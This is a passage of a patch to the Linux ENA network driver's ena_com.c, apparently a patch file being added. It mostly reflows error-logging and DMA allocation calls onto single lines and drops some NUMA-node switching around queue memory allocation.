+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+ 		return -ENOMEM;
+@@ -320,7 +312,6 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 			      struct ena_com_io_sq *io_sq)
+ {
+ 	size_t size;
+-	int dev_node = 0;
+ 
+ 	memset(&io_sq->desc_addr, 0x0, sizeof(io_sq->desc_addr));
+ 
+@@ -333,23 +324,17 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 	size = io_sq->desc_entry_size * io_sq->q_depth;
+ 
+ 	if (io_sq->mem_queue_type == ENA_ADMIN_PLACEMENT_POLICY_HOST) {
+-		dev_node = dev_to_node(ena_dev->dmadev);
+-		set_dev_node(ena_dev->dmadev, ctx->numa_node);
+ 		io_sq->desc_addr.virt_addr =
+-			dma_alloc_coherent(ena_dev->dmadev, size,
+-					   &io_sq->desc_addr.phys_addr,
++			dma_alloc_coherent(ena_dev->dmadev, size, &io_sq->desc_addr.phys_addr,
+ 					   GFP_KERNEL);
+-		set_dev_node(ena_dev->dmadev, dev_node);
+ 		if (!io_sq->desc_addr.virt_addr) {
+ 			io_sq->desc_addr.virt_addr =
+ 				dma_alloc_coherent(ena_dev->dmadev, size,
+-						   &io_sq->desc_addr.phys_addr,
+-						   GFP_KERNEL);
++						   &io_sq->desc_addr.phys_addr, GFP_KERNEL);
+ 		}
+ 
+ 		if (!io_sq->desc_addr.virt_addr) {
+-			netdev_err(ena_dev->net_device,
+-				   "Memory allocation failed\n");
++			netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+ 			return -ENOMEM;
+ 		}
+ 	}
+@@ -365,18 +350,13 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 		size = (size_t)io_sq->bounce_buf_ctrl.buffer_size *
+ 			io_sq->bounce_buf_ctrl.buffers_num;
+ 
+-		dev_node = dev_to_node(ena_dev->dmadev);
+-		set_dev_node(ena_dev->dmadev, ctx->numa_node);
+-		io_sq->bounce_buf_ctrl.base_buffer =
+-			devm_kzalloc(ena_dev->dmadev, size, GFP_KERNEL);
+-		set_dev_node(ena_dev->dmadev, dev_node);
++		io_sq->bounce_buf_ctrl.base_buffer = devm_kzalloc(ena_dev->dmadev, size, GFP_KERNEL);
+ 		if (!io_sq->bounce_buf_ctrl.base_buffer)
+ 			io_sq->bounce_buf_ctrl.base_buffer =
+ 				devm_kzalloc(ena_dev->dmadev, size, GFP_KERNEL);
+ 
+ 		if (!io_sq->bounce_buf_ctrl.base_buffer) {
+-			netdev_err(ena_dev->net_device,
+-				   "Bounce buffer memory allocation failed\n");
++			netdev_err(ena_dev->net_device, "Bounce buffer memory allocation failed\n");
+ 			return -ENOMEM;
+ 		}
+ 
+@@ -410,7 +390,6 @@ static int ena_com_init_io_cq(struct ena_com_dev *ena_dev,
+ 			      struct ena_com_io_cq *io_cq)
+ {
+ 	size_t size;
+-	int prev_node = 0;
+ 
+ 	memset(&io_cq->cdesc_addr, 0x0, sizeof(io_cq->cdesc_addr));
+ 
+@@ -422,16 +401,11 @@ static int ena_com_init_io_cq(struct ena_com_dev *ena_dev,
+ 
+ 	size = io_cq->cdesc_entry_size_in_bytes * io_cq->q_depth;
+ 
+-	prev_node = dev_to_node(ena_dev->dmadev);
+-	set_dev_node(ena_dev->dmadev, ctx->numa_node);
+ 	io_cq->cdesc_addr.virt_addr =
+-		dma_alloc_coherent(ena_dev->dmadev, size,
+-				   &io_cq->cdesc_addr.phys_addr, GFP_KERNEL);
+-	set_dev_node(ena_dev->dmadev, prev_node);
++		dma_alloc_coherent(ena_dev->dmadev, size, &io_cq->cdesc_addr.phys_addr, GFP_KERNEL);
+ 	if (!io_cq->cdesc_addr.virt_addr) {
+ 		io_cq->cdesc_addr.virt_addr =
+-			dma_alloc_coherent(ena_dev->dmadev, size,
+-					   &io_cq->cdesc_addr.phys_addr,
++			dma_alloc_coherent(ena_dev->dmadev, size, &io_cq->cdesc_addr.phys_addr,
+ 					   GFP_KERNEL);
+ 	}
+ 
+@@ -514,8 +488,8 @@ static int ena_com_comp_status_to_errno(struct ena_com_admin_queue *admin_queue,
+ 					u8 comp_status)
+ {
+ 	if (unlikely(comp_status != 0))
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Admin command failed[%u]\n", comp_status);
++		netdev_err(admin_queue->ena_dev->net_device, "Admin command failed[%u]\n",
++			   comp_status);
+ 
+ 	switch (comp_status) {
+ 	case ENA_ADMIN_SUCCESS:
+@@ -580,8 +554,7 @@ static int ena_com_wait_and_process_admin_cq_polling(struct ena_comp_ctx *comp_c
+ 	}
+ 
+ 	if (unlikely(comp_ctx->status == ENA_CMD_ABORTED)) {
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Command was aborted\n");
++		netdev_err(admin_queue->ena_dev->net_device, "Command was aborted\n");
+ 		spin_lock_irqsave(&admin_queue->q_lock, flags);
+ 		admin_queue->stats.aborted_cmd++;
+ 		spin_unlock_irqrestore(&admin_queue->q_lock, flags);
+@@ -589,8 +562,7 @@ static int ena_com_wait_and_process_admin_cq_polling(struct ena_comp_ctx *comp_c
+ 		goto err;
+ 	}
+ 
+-	WARN(comp_ctx->status != ENA_CMD_COMPLETED, "Invalid comp status %d\n",
+-	     comp_ctx->status);
++	WARN(comp_ctx->status != ENA_CMD_COMPLETED, "Invalid comp status %d\n", comp_ctx->status);
+ 
+ 	ret = ena_com_comp_status_to_errno(admin_queue, comp_ctx->comp_status);
+ err:
+@@ -634,8 +606,7 @@ static int ena_com_set_llq(struct ena_com_dev *ena_dev)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set LLQ configurations: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set LLQ configurations: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -658,8 +629,7 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 			llq_default_cfg->llq_header_location;
+ 	} else {
+ 		netdev_err(ena_dev->net_device,
+-			   "Invalid header location control, supported: 0x%x\n",
+-			   supported_feat);
++			   "Invalid header location control, supported: 0x%x\n", supported_feat);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -681,8 +651,8 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 
+ 			netdev_err(ena_dev->net_device,
+ 				   "Default llq stride ctrl is not supported, performing fallback, default: 0x%x, supported: 0x%x, used: 0x%x\n",
+-				   llq_default_cfg->llq_stride_ctrl,
+-				   supported_feat, llq_info->desc_stride_ctrl);
++				   llq_default_cfg->llq_stride_ctrl, supported_feat,
++				   llq_info->desc_stride_ctrl);
+ 		}
+ 	} else {
+ 		llq_info->desc_stride_ctrl = 0;
+@@ -704,8 +674,7 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 			llq_info->desc_list_entry_size = 256;
+ 		} else {
+ 			netdev_err(ena_dev->net_device,
+-				   "Invalid entry_size_ctrl, supported: 0x%x\n",
+-				   supported_feat);
++				   "Invalid entry_size_ctrl, supported: 0x%x\n", supported_feat);
+ 			return -EINVAL;
+ 		}
+ 
+@@ -750,8 +719,8 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 
+ 		netdev_err(ena_dev->net_device,
+ 			   "Default llq num descs before header is not supported, performing fallback, default: 0x%x, supported: 0x%x, used: 0x%x\n",
+-			   llq_default_cfg->llq_num_decs_before_header,
+-			   supported_feat, llq_info->descs_num_before_header);
++			   llq_default_cfg->llq_num_decs_before_header, supported_feat,
++			   llq_info->descs_num_before_header);
+ 	}
+ 	/* Check for accelerated queue supported */
+ 	llq_accel_mode_get = llq_features->accel_mode.u.get;
+@@ -767,8 +736,7 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 
+ 	rc = ena_com_set_llq(ena_dev);
+ 	if (rc)
+-		netdev_err(ena_dev->net_device,
+-			   "Cannot set LLQ configuration: %d\n", rc);
++		netdev_err(ena_dev->net_device, "Cannot set LLQ configuration: %d\n", rc);
+ 
+ 	return rc;
+ }
+@@ -780,8 +748,7 @@ static int ena_com_wait_and_process_admin_cq_interrupts(struct ena_comp_ctx *com
+ 	int ret;
+ 
+ 	wait_for_completion_timeout(&comp_ctx->wait_event,
+-				    usecs_to_jiffies(
+-					    admin_queue->completion_timeout));
++				    usecs_to_jiffies(admin_queue->completion_timeout));
+ 
+ 	/* In case the command wasn't completed find out the root cause.
+ 	 * There might be 2 kinds of errors
+@@ -797,8 +764,7 @@ static int ena_com_wait_and_process_admin_cq_interrupts(struct ena_comp_ctx *com
+ 		if (comp_ctx->status == ENA_CMD_COMPLETED) {
+ 			netdev_err(admin_queue->ena_dev->net_device,
+ 				   "The ena device sent a completion but the driver didn't receive a MSI-X interrupt (cmd %d), autopolling mode is %s\n",
+-				   comp_ctx->cmd_opcode,
+-				   admin_queue->auto_polling ? "ON" : "OFF");
++				   comp_ctx->cmd_opcode, admin_queue->auto_polling ? "ON" : "OFF");
+ 			/* Check if fallback to polling is enabled */
+ 			if (admin_queue->auto_polling)
+ 				admin_queue->polling = true;
+@@ -867,15 +833,13 @@ static u32 ena_com_reg_bar_read32(struct ena_com_dev *ena_dev, u16 offset)
+ 	if (unlikely(i == timeout)) {
+ 		netdev_err(ena_dev->net_device,
+ 			   "Reading reg failed for timeout. expected: req id[%u] offset[%u] actual: req id[%u] offset[%u]\n",
+-			   mmio_read->seq_num, offset, read_resp->req_id,
+-			   read_resp->reg_off);
++			   mmio_read->seq_num, offset, read_resp->req_id, read_resp->reg_off);
+ 		ret = ENA_MMIO_READ_TIMEOUT;
+ 		goto err;
+ 	}
+ 
+ 	if (read_resp->reg_off != offset) {
+-		netdev_err(ena_dev->net_device,
+-			   "Read failure: wrong offset provided\n");
++		netdev_err(ena_dev->net_device, "Read failure: wrong offset provided\n");
+ 		ret = ENA_MMIO_READ_TIMEOUT;
+ 	} else {
+ 		ret = read_resp->reg_val;
+@@ -934,8 +898,7 @@ static int ena_com_destroy_io_sq(struct ena_com_dev *ena_dev,
+ 					    sizeof(destroy_resp));
+ 
+ 	if (unlikely(ret && (ret != -ENODEV)))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to destroy io sq error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to destroy io sq error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -949,8 +912,7 @@ static void ena_com_io_queue_free(struct ena_com_dev *ena_dev,
+ 	if (io_cq->cdesc_addr.virt_addr) {
+ 		size = io_cq->cdesc_entry_size_in_bytes * io_cq->q_depth;
+ 
+-		dma_free_coherent(ena_dev->dmadev, size,
+-				  io_cq->cdesc_addr.virt_addr,
++		dma_free_coherent(ena_dev->dmadev, size, io_cq->cdesc_addr.virt_addr,
+ 				  io_cq->cdesc_addr.phys_addr);
+ 
+ 		io_cq->cdesc_addr.virt_addr = NULL;
+@@ -959,8 +921,7 @@ static void ena_com_io_queue_free(struct ena_com_dev *ena_dev,
+ 	if (io_sq->desc_addr.virt_addr) {
+ 		size = io_sq->desc_entry_size * io_sq->q_depth;
+ 
+-		dma_free_coherent(ena_dev->dmadev, size,
+-				  io_sq->desc_addr.virt_addr,
++		dma_free_coherent(ena_dev->dmadev, size, io_sq->desc_addr.virt_addr,
+ 				  io_sq->desc_addr.phys_addr);
+ 
+ 		io_sq->desc_addr.virt_addr = NULL;
+@@ -985,8 +946,7 @@ static int wait_for_reset_state(struct ena_com_dev *ena_dev, u32 timeout,
+ 		val = ena_com_reg_bar_read32(ena_dev, ENA_REGS_DEV_STS_OFF);
+ 
+ 		if (unlikely(val == ENA_MMIO_READ_TIMEOUT)) {
+-			netdev_err(ena_dev->net_device,
+-				   "Reg read timeout occurred\n");
++			netdev_err(ena_dev->net_device, "Reg read timeout occurred\n");
+ 			return -ETIME;
+ 		}
+ 
+@@ -1026,8 +986,7 @@ static int ena_com_get_feature_ex(struct ena_com_dev *ena_dev,
+ 	int ret;
+ 
+ 	if (!ena_com_check_supported_feature_id(ena_dev, feature_id)) {
+-		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+-			   feature_id);
++		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n", feature_id);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+@@ -1064,8 +1023,7 @@ static int ena_com_get_feature_ex(struct ena_com_dev *ena_dev,
+ 
+ 	if (unlikely(ret))
+ 		netdev_err(ena_dev->net_device,
+-			   "Failed to submit get_feature command %d error: %d\n",
+-			   feature_id, ret);
++			   "Failed to submit get_feature command %d error: %d\n", feature_id, ret);
+ 
+ 	return ret;
+ }
+@@ -1104,13 +1062,11 @@ static int ena_com_hash_key_allocate(struct ena_com_dev *ena_dev)
+ {
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+-	if (!ena_com_check_supported_feature_id(ena_dev,
+-						ENA_ADMIN_RSS_HASH_FUNCTION))
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_HASH_FUNCTION))
+ 		return -EOPNOTSUPP;
+ 
+-	rss->hash_key =
+-		dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_key),
+-				   &rss->hash_key_dma_addr, GFP_KERNEL);
++	rss->hash_key = dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_key),
++					   &rss->hash_key_dma_addr, GFP_KERNEL);
+ 
+ 	if (unlikely(!rss->hash_key))
+ 		return -ENOMEM;
+@@ -1123,8 +1079,8 @@ static void ena_com_hash_key_destroy(struct ena_com_dev *ena_dev)
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+ 	if (rss->hash_key)
+-		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_key),
+-				  rss->hash_key, rss->hash_key_dma_addr);
++		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_key), rss->hash_key,
++				  rss->hash_key_dma_addr);
+ 	rss->hash_key = NULL;
+ }
+ 
+@@ -1132,9 +1088,8 @@ static int ena_com_hash_ctrl_init(struct ena_com_dev *ena_dev)
+ {
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+-	rss->hash_ctrl =
+-		dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl),
+-				   &rss->hash_ctrl_dma_addr, GFP_KERNEL);
++	rss->hash_ctrl = dma_alloc_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl),
++					    &rss->hash_ctrl_dma_addr, GFP_KERNEL);
+ 
+ 	if (unlikely(!rss->hash_ctrl))
+ 		return -ENOMEM;
+@@ -1147,8 +1102,8 @@ static void ena_com_hash_ctrl_destroy(struct ena_com_dev *ena_dev)
+ 	struct ena_rss *rss = &ena_dev->rss;
+ 
+ 	if (rss->hash_ctrl)
+-		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl),
+-				  rss->hash_ctrl, rss->hash_ctrl_dma_addr);
++		dma_free_coherent(ena_dev->dmadev, sizeof(*rss->hash_ctrl), rss->hash_ctrl,
++				  rss->hash_ctrl_dma_addr);
+ 	rss->hash_ctrl = NULL;
+ }
+ 
+@@ -1177,15 +1132,13 @@ static int ena_com_indirect_table_allocate(struct ena_com_dev *ena_dev,
+ 	tbl_size = (1ULL << log_size) *
+ 		sizeof(struct ena_admin_rss_ind_table_entry);
+ 
+-	rss->rss_ind_tbl =
+-		dma_alloc_coherent(ena_dev->dmadev, tbl_size,
+-				   &rss->rss_ind_tbl_dma_addr, GFP_KERNEL);
++	rss->rss_ind_tbl = dma_alloc_coherent(ena_dev->dmadev, tbl_size, &rss->rss_ind_tbl_dma_addr,
++					      GFP_KERNEL);
+ 	if (unlikely(!rss->rss_ind_tbl))
+ 		goto mem_err1;
+ 
+ 	tbl_size = (1ULL << log_size) * sizeof(u16);
+-	rss->host_rss_ind_tbl =
+-		devm_kzalloc(ena_dev->dmadev, tbl_size, GFP_KERNEL);
++	rss->host_rss_ind_tbl = devm_kzalloc(ena_dev->dmadev, tbl_size, GFP_KERNEL);
+ 	if (unlikely(!rss->host_rss_ind_tbl))
+ 		goto mem_err2;
+ 
+@@ -1197,8 +1150,7 @@ static int ena_com_indirect_table_allocate(struct ena_com_dev *ena_dev,
+ 	tbl_size = (1ULL << log_size) *
+ 		sizeof(struct ena_admin_rss_ind_table_entry);
+ 
+-	dma_free_coherent(ena_dev->dmadev, tbl_size, rss->rss_ind_tbl,
+-			  rss->rss_ind_tbl_dma_addr);
++	dma_free_coherent(ena_dev->dmadev, tbl_size, rss->rss_ind_tbl, rss->rss_ind_tbl_dma_addr);
+ 	rss->rss_ind_tbl = NULL;
+ mem_err1:
+ 	rss->tbl_log_size = 0;
+@@ -1261,8 +1213,7 @@ static int ena_com_create_io_sq(struct ena_com_dev *ena_dev,
+ 					   &create_cmd.sq_ba,
+ 					   io_sq->desc_addr.phys_addr);
+ 		if (unlikely(ret)) {
+-			netdev_err(ena_dev->net_device,
+-				   "Memory address set failed\n");
++			netdev_err(ena_dev->net_device, "Memory address set failed\n");
+ 			return ret;
+ 		}
+ 	}
+@@ -1273,8 +1224,7 @@ static int ena_com_create_io_sq(struct ena_com_dev *ena_dev,
+ 					    (struct ena_admin_acq_entry *)&cmd_completion,
+ 					    sizeof(cmd_completion));
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to create IO SQ. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to create IO SQ. error: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -1292,8 +1242,7 @@ static int ena_com_create_io_sq(struct ena_com_dev *ena_dev,
+ 			cmd_completion.llq_descriptors_offset);
+ 	}
+ 
+-	netdev_dbg(ena_dev->net_device, "Created sq[%u], depth[%u]\n",
+-		   io_sq->idx, io_sq->q_depth);
++	netdev_dbg(ena_dev->net_device, "Created sq[%u], depth[%u]\n", io_sq->idx, io_sq->q_depth);
+ 
+ 	return ret;
+ }
+@@ -1420,8 +1369,7 @@ int ena_com_create_io_cq(struct ena_com_dev *ena_dev,
+ 					    (struct ena_admin_acq_entry *)&cmd_completion,
+ 					    sizeof(cmd_completion));
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to create IO CQ. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to create IO CQ. error: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -1440,8 +1388,7 @@ int ena_com_create_io_cq(struct ena_com_dev *ena_dev,
+ 			(u32 __iomem *)((uintptr_t)ena_dev->reg_bar +
+ 			cmd_completion.numa_node_register_offset);
+ 
+-	netdev_dbg(ena_dev->net_device, "Created cq[%u], depth[%u]\n",
+-		   io_cq->idx, io_cq->q_depth);
++	netdev_dbg(ena_dev->net_device, "Created cq[%u], depth[%u]\n", io_cq->idx, io_cq->q_depth);
+ 
+ 	return ret;
+ }
+@@ -1451,8 +1398,7 @@ int ena_com_get_io_handlers(struct ena_com_dev *ena_dev, u16 qid,
+ 			    struct ena_com_io_cq **io_cq)
+ {
+ 	if (qid >= ENA_TOTAL_NUM_QUEUES) {
+-		netdev_err(ena_dev->net_device,
+-			   "Invalid queue number %d but the max is %d\n", qid,
++		netdev_err(ena_dev->net_device, "Invalid queue number %d but the max is %d\n", qid,
+ 			   ENA_TOTAL_NUM_QUEUES);
+ 		return -EINVAL;
+ 	}
+@@ -1492,8 +1438,7 @@ void ena_com_wait_for_abort_completion(struct ena_com_dev *ena_dev)
+ 	spin_lock_irqsave(&admin_queue->q_lock, flags);
+ 	while (atomic_read(&admin_queue->outstanding_cmds) != 0) {
+ 		spin_unlock_irqrestore(&admin_queue->q_lock, flags);
+-		ena_delay_exponential_backoff_us(exp++,
+-						 ena_dev->ena_min_poll_delay_us);
++		ena_delay_exponential_backoff_us(exp++, ena_dev->ena_min_poll_delay_us);
+ 		spin_lock_irqsave(&admin_queue->q_lock, flags);
+ 	}
+ 	spin_unlock_irqrestore(&admin_queue->q_lock, flags);
+@@ -1519,8 +1464,7 @@ int ena_com_destroy_io_cq(struct ena_com_dev *ena_dev,
+ 					    sizeof(destroy_resp));
+ 
+ 	if (unlikely(ret && (ret != -ENODEV)))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to destroy IO CQ. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to destroy IO CQ. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -1588,8 +1532,7 @@ int ena_com_set_aenq_config(struct ena_com_dev *ena_dev, u32 groups_flag)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to config AENQ ret: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to config AENQ ret: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -1610,8 +1553,7 @@ int ena_com_get_dma_width(struct ena_com_dev *ena_dev)
+ 	netdev_dbg(ena_dev->net_device, "ENA dma width: %d\n", width);
+ 
+ 	if ((width < 32) || width > ENA_MAX_PHYS_ADDR_SIZE_BITS) {
+-		netdev_err(ena_dev->net_device, "DMA width illegal value: %d\n",
+-			   width);
++		netdev_err(ena_dev->net_device, "DMA width illegal value: %d\n", width);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -1633,19 +1575,16 @@ int ena_com_validate_version(struct ena_com_dev *ena_dev)
+ 	ctrl_ver = ena_com_reg_bar_read32(ena_dev,
+ 					  ENA_REGS_CONTROLLER_VERSION_OFF);
+ 
+-	if (unlikely((ver == ENA_MMIO_READ_TIMEOUT) ||
+-		     (ctrl_ver == ENA_MMIO_READ_TIMEOUT))) {
++	if (unlikely((ver == ENA_MMIO_READ_TIMEOUT) || (ctrl_ver == ENA_MMIO_READ_TIMEOUT))) {
+ 		netdev_err(ena_dev->net_device, "Reg read timeout occurred\n");
+ 		return -ETIME;
+ 	}
+ 
+ 	dev_info(ena_dev->dmadev, "ENA device version: %d.%d\n",
+-		 (ver & ENA_REGS_VERSION_MAJOR_VERSION_MASK) >>
+-			 ENA_REGS_VERSION_MAJOR_VERSION_SHIFT,
++		 (ver & ENA_REGS_VERSION_MAJOR_VERSION_MASK) >> ENA_REGS_VERSION_MAJOR_VERSION_SHIFT,
+ 		 ver & ENA_REGS_VERSION_MINOR_VERSION_MASK);
+ 
+-	dev_info(ena_dev->dmadev,
+-		 "ENA controller version: %d.%d.%d implementation version %d\n",
++	dev_info(ena_dev->dmadev, "ENA controller version: %d.%d.%d implementation version %d\n",
+ 		 (ctrl_ver & ENA_REGS_CONTROLLER_VERSION_MAJOR_VERSION_MASK) >>
+ 			 ENA_REGS_CONTROLLER_VERSION_MAJOR_VERSION_SHIFT,
+ 		 (ctrl_ver & ENA_REGS_CONTROLLER_VERSION_MINOR_VERSION_MASK) >>
+@@ -1694,20 +1633,17 @@ void ena_com_admin_destroy(struct ena_com_dev *ena_dev)
+ 
+ 	size = ADMIN_SQ_SIZE(admin_queue->q_depth);
+ 	if (sq->entries)
+-		dma_free_coherent(ena_dev->dmadev, size, sq->entries,
+-				  sq->dma_addr);
++		dma_free_coherent(ena_dev->dmadev, size, sq->entries, sq->dma_addr);
+ 	sq->entries = NULL;
+ 
+ 	size = ADMIN_CQ_SIZE(admin_queue->q_depth);
+ 	if (cq->entries)
+-		dma_free_coherent(ena_dev->dmadev, size, cq->entries,
+-				  cq->dma_addr);
++		dma_free_coherent(ena_dev->dmadev, size, cq->entries, cq->dma_addr);
+ 	cq->entries = NULL;
+ 
+ 	size = ADMIN_AENQ_SIZE(aenq->q_depth);
+ 	if (ena_dev->aenq.entries)
+-		dma_free_coherent(ena_dev->dmadev, size, aenq->entries,
+-				  aenq->dma_addr);
++		dma_free_coherent(ena_dev->dmadev, size, aenq->entries, aenq->dma_addr);
+ 	aenq->entries = NULL;
+ }
+ 
+@@ -1733,10 +1669,8 @@ int ena_com_mmio_reg_read_request_init(struct ena_com_dev *ena_dev)
+ 	struct ena_com_mmio_read *mmio_read = &ena_dev->mmio_read;
+ 
+ 	spin_lock_init(&mmio_read->lock);
+-	mmio_read->read_resp =
+-		dma_alloc_coherent(ena_dev->dmadev,
+-				   sizeof(*mmio_read->read_resp),
+-				   &mmio_read->read_resp_dma_addr, GFP_KERNEL);
++	mmio_read->read_resp = dma_alloc_coherent(ena_dev->dmadev, sizeof(*mmio_read->read_resp),
++						  &mmio_read->read_resp_dma_addr, GFP_KERNEL);
+ 	if (unlikely(!mmio_read->read_resp))
+ 		goto err;
+ 
+@@ -1767,8 +1701,8 @@ void ena_com_mmio_reg_read_request_destroy(struct ena_com_dev *ena_dev)
+ 	writel(0x0, ena_dev->reg_bar + ENA_REGS_MMIO_RESP_LO_OFF);
+ 	writel(0x0, ena_dev->reg_bar + ENA_REGS_MMIO_RESP_HI_OFF);
+ 
+-	dma_free_coherent(ena_dev->dmadev, sizeof(*mmio_read->read_resp),
+-			  mmio_read->read_resp, mmio_read->read_resp_dma_addr);
++	dma_free_coherent(ena_dev->dmadev, sizeof(*mmio_read->read_resp), mmio_read->read_resp,
++			  mmio_read->read_resp_dma_addr);
+ 
+ 	mmio_read->read_resp = NULL;
+ }
+@@ -1800,8 +1734,7 @@ int ena_com_admin_init(struct ena_com_dev *ena_dev,
+ 	}
+ 
+ 	if (!(dev_sts & ENA_REGS_DEV_STS_READY_MASK)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Device isn't ready, abort com init\n");
++		netdev_err(ena_dev->net_device, "Device isn't ready, abort com init\n");
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1878,8 +1811,7 @@ int ena_com_create_io_queue(struct ena_com_dev *ena_dev,
+ 	int ret;
+ 
+ 	if (ctx->qid >= ENA_TOTAL_NUM_QUEUES) {
+-		netdev_err(ena_dev->net_device,
+-			   "Qid (%d) is bigger than max num of queues (%d)\n",
++		netdev_err(ena_dev->net_device, "Qid (%d) is bigger than max num of queues (%d)\n",
+ 			   ctx->qid, ENA_TOTAL_NUM_QUEUES);
+ 		return -EINVAL;
+ 	}
+@@ -1905,8 +1837,7 @@ int ena_com_create_io_queue(struct ena_com_dev *ena_dev,
+ 
+ 	if (ctx->direction == ENA_COM_IO_QUEUE_DIRECTION_TX)
+ 		/* header length is limited to 8 bits */
+-		io_sq->tx_max_header_size =
+-			min_t(u32, ena_dev->tx_max_header_size, SZ_256);
++		io_sq->tx_max_header_size = min_t(u32, ena_dev->tx_max_header_size, SZ_256);
+ 
+ 	ret = ena_com_init_io_sq(ena_dev, ctx, io_sq);
+ 	if (ret)
+@@ -1938,8 +1869,7 @@ void ena_com_destroy_io_queue(struct ena_com_dev *ena_dev, u16 qid)
+ 	struct ena_com_io_cq *io_cq;
+ 
+ 	if (qid >= ENA_TOTAL_NUM_QUEUES) {
+-		netdev_err(ena_dev->net_device,
+-			   "Qid (%d) is bigger than max num of queues (%d)\n",
++		netdev_err(ena_dev->net_device, "Qid (%d) is bigger than max num of queues (%d)\n",
+ 			   qid, ENA_TOTAL_NUM_QUEUES);
+ 		return;
+ 	}
+@@ -1983,8 +1913,7 @@ int ena_com_get_dev_attr_feat(struct ena_com_dev *ena_dev,
+ 		if (rc)
+ 			return rc;
+ 
+-		if (get_resp.u.max_queue_ext.version !=
+-		    ENA_FEATURE_MAX_QUEUE_EXT_VER)
++		if (get_resp.u.max_queue_ext.version != ENA_FEATURE_MAX_QUEUE_EXT_VER)
+ 			return -EINVAL;
+ 
+ 		memcpy(&get_feat_ctx->max_queue_ext, &get_resp.u.max_queue_ext,
+@@ -2025,18 +1954,15 @@ int ena_com_get_dev_attr_feat(struct ena_com_dev *ena_dev,
+ 	rc = ena_com_get_feature(ena_dev, &get_resp, ENA_ADMIN_HW_HINTS, 0);
+ 
+ 	if (!rc)
+-		memcpy(&get_feat_ctx->hw_hints, &get_resp.u.hw_hints,
+-		       sizeof(get_resp.u.hw_hints));
++		memcpy(&get_feat_ctx->hw_hints, &get_resp.u.hw_hints, sizeof(get_resp.u.hw_hints));
+ 	else if (rc == -EOPNOTSUPP)
+-		memset(&get_feat_ctx->hw_hints, 0x0,
+-		       sizeof(get_feat_ctx->hw_hints));
++		memset(&get_feat_ctx->hw_hints, 0x0, sizeof(get_feat_ctx->hw_hints));
+ 	else
+ 		return rc;
+ 
+ 	rc = ena_com_get_feature(ena_dev, &get_resp, ENA_ADMIN_LLQ, 0);
+ 	if (!rc)
+-		memcpy(&get_feat_ctx->llq, &get_resp.u.llq,
+-		       sizeof(get_resp.u.llq));
++		memcpy(&get_feat_ctx->llq, &get_resp.u.llq, sizeof(get_resp.u.llq));
+ 	else if (rc == -EOPNOTSUPP)
+ 		memset(&get_feat_ctx->llq, 0x0, sizeof(get_feat_ctx->llq));
+ 	else
+@@ -2084,8 +2010,7 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *ena_dev, void *data)
+ 	aenq_common = &aenq_e->aenq_common_desc;
+ 
+ 	/* Go over all the events */
+-	while ((READ_ONCE(aenq_common->flags) &
+-		ENA_ADMIN_AENQ_COMMON_DESC_PHASE_MASK) == phase) {
++	while ((READ_ONCE(aenq_common->flags) & ENA_ADMIN_AENQ_COMMON_DESC_PHASE_MASK) == phase) {
+ 		/* Make sure the phase bit (ownership) is as expected before
+ 		 * reading the rest of the descriptor.
+ 		 */
+@@ -2094,8 +2019,7 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *ena_dev, void *data)
+ 		timestamp = (u64)aenq_common->timestamp_low |
+ 			((u64)aenq_common->timestamp_high << 32);
+ 
+-		netdev_dbg(ena_dev->net_device,
+-			   "AENQ! Group[%x] Syndrome[%x] timestamp: [%llus]\n",
++		netdev_dbg(ena_dev->net_device, "AENQ! Group[%x] Syndrome[%x] timestamp: [%llus]\n",
